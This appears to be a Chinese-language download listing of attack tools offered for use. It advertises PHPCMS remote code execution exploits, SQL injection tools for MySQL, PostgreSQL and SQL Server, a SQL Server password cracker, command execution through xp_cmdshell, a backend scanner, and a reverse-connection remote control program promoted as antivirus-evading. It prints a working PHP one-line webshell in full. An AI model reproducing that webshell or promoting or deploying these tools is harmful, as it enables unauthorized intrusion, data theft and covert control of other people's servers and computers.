phpcms_9.5.1_index.php_远程代码执行漏洞(利用工具)

phpcms_9.5.1_index.php_远程代码执行漏洞(利用工具)

phpcms2008 yp/prodcut.php 代码执行漏洞 利用工具

phpcms 2008 yp/product.php 文件pagesize参数没有过滤，导致执行任意php代码，利用前提pagesize>1。

河马MySQL注入工具v1.1

河马MySQL注入工具v1.1，通过web前端应用获取数据库的内容。 support : UNION support : Error based

河马PostgreSQL注入工具v1.0

这个工具可以通过web接口，获取postgreSQL数据库的内容， 支持：数据获取 支持：文件读取。 contact me :[email protected]

河马SQL_Server口令猜解器

破解sql server 数据库的登录口令。 contact me :[email protected]

河马网站后台扫描器

这个工具使用多线程查找网站的后台目录，上传地址，其它敏感目录等。 contact me :[email protected]

SQL Server弱口令利用工具1.3版

这个工具使用sql server 的一些功能，执行操作系统命令， support xp_cmdshell execute arbtriry command support sp_OACreate create Wscript.shell execute arbtriry commnad support xp_dirtree list system directroy support execute SQL Query contact me :[email protected]

php一句话webshell 服务端和客户端

php一句话webshell 服务端和客户端，一句话为 <?php $_GET[2]($_GET[0]($_GET[1]));?> 支持函数system,passthru,shell_exec 可以执行操作系统任意命令，windows linux unix 等。 [email protected],欢迎下载使用，本软件为免费版。

河马SQLServer数据库专用注入工具v1.0

利用前提，存在php+sqlserver数据库的注入点，或asp+sqlserver数据库的注入点, 或jsp+sqlserver数据库的注入点,就可以利用本工具，查询表，字段，数据，并且 可以执行系统cmd命令和显示主机系统目录列表，这个工具有一个亮点是支持cookie 和身份验证。 速度很快，一款不错的工具，值得收藏。 这是网上唯一一款支持cookie的注入工具。

河马远控3.1免杀版

大家好，今天给大家带来一款我自主开发的 采用反弹端口技术 远程控制软件 版本是3.1 该版本主要实现了以下功能: 1. 远程控制 2. 屏幕查看 3. 文件传输 4. Telnet超级终端 5. 卸载服务端 使用方法如下 先配置一个服务端， 点击生成服务端 域名和ip地址这里填写，被控端要连接的动态域名或静态ip地址 端口这里我填写80 然后将服务端运行一下，我这里在虚拟机下运行。 现在等待被控端上线，一般为1分钟内 等待 好了 已经上线了 好了， 完，有什么问题可以QQ上联系。 软件作者： 赵显阳 QQ：343561636 Email:[email protected]